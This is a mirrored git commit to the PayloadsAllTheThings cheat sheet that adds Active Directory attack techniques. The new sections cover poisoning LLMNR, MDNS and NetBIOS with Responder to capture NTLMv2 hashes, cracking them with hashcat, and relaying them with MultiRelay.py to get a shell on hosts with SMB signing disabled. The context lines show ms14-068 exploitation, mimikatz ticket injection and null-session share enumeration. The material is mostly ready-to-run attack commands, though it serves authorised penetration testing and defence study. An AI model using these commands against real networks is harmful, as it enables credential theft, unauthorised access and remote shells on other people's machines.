mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
NTLMv2 hash capturing, cracking, replaying
This commit is contained in:
parent
d5478d1fd6
commit
d57d59eca7
@ -15,6 +15,8 @@
|
|||||||
* [Kerberoast](#kerberoast)
|
* [Kerberoast](#kerberoast)
|
||||||
* [Pass-the-Hash](#pass-the-hash)
|
* [Pass-the-Hash](#pass-the-hash)
|
||||||
* [OverPass-the-Hash (pass the key)](#overpass-the-hash-pass-the-key)
|
* [OverPass-the-Hash (pass the key)](#overpass-the-hash-pass-the-key)
|
||||||
|
* [Capturing and cracking NTLMv2 hashes](#capturing-and-cracking-ntlmv2-hashes)
|
||||||
|
* [NTLMv2 hashes relaying](#ntlv2-hashes-relaying)
|
||||||
* [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
|
* [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
|
||||||
* [Trust relationship between domains](#trust-relationship-between-domains)
|
* [Trust relationship between domains](#trust-relationship-between-domains)
|
||||||
* [Privilege Escalation](#privilege-escalation)
|
* [Privilege Escalation](#privilege-escalation)
|
||||||
@ -80,7 +82,7 @@ python ./ms14-068.py -u darthsidious@lab.adsecurity.org -p TheEmperor99! -s S-1-
|
|||||||
mimikatz.exe "kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache"
|
mimikatz.exe "kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache"
|
||||||
```
|
```
|
||||||
|
|
||||||
## Open Shares
|
### Open Shares
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
smbmap -H 10.10.10.100 # null session
|
smbmap -H 10.10.10.100 # null session
|
||||||
@ -408,6 +410,29 @@ kinit -t ~/mykers tgwynn@LAB.ROPNOP.COM
|
|||||||
klist
|
klist
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## Capturing and cracking NTLMv2 hashes
|
||||||
|
|
||||||
|
If any user in the network tries to access a machine and mistype the IP or the name, Responder will answer for it and ask for the NTLMv2 hash to access the resource. Responder will poison `LLMNR`, `MDNS` and `NETBIOS` requests on the network.
|
||||||
|
|
||||||
|
```python
|
||||||
|
python Responder.py -I eth0
|
||||||
|
```
|
||||||
|
|
||||||
|
Then crack the hash with `hashcat`
|
||||||
|
|
||||||
|
```powershell
|
||||||
|
hashcat -m 5600 -a 0 hash.txt crackstation.txt
|
||||||
|
```
|
||||||
|
|
||||||
|
## NTLMv2 hashes relaying
|
||||||
|
|
||||||
|
If a machine has `SMB signing`:`disabled`, it is possible to use Responder with Multirelay.py script to perform an `NTLMv2 hashes relay` and get a shell access on the machine.
|
||||||
|
|
||||||
|
1. Open the Responder.conf file and set the value of `SMB` and `HTTP` to `Off`.
|
||||||
|
2. Run `python RunFinger.py -i IP_Range` to detect machine with `SMB signing`:`disabled`.
|
||||||
|
3. Run `python Responder.py -I <interface_card>` and `python MultiRelay.py -t <target_machine_IP> -u ALL`
|
||||||
|
4. Wait for a shell
|
||||||
|
|
||||||
### Dangerous Built-in Groups Usage
|
### Dangerous Built-in Groups Usage
|
||||||
|
|
||||||
AdminSDHolder
|
AdminSDHolder
|
||||||
|
Loading…
Reference in New Issue
Block a user